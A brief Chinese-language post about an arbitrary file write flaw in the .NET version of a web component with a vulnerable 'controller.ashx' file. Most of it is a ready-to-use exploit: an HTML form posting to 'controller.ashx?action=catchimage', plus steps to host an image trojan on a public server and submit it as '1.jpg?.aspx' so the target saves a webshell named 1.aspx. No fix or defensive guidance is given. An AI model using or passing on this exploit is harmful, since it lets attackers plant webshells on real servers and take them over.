本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞
漏洞文件为“controller.ashx“<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /></form>
只需修改action的url即可使用,由于该上传漏洞不能本地上传文件,只能利用远程文件上传,所以需要在公网服务器上布置好图片木马(例如1.jpg),且需要上传地址将木马文件名修改成“1.jpg?.aspx”样式,填写远程服务器木马地址上传后即可得到名为1.aspx的webshell